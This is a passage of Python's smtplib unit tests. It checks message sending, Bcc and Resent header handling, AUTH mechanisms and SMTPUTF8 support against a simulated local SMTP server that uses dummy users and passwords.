smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3
)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
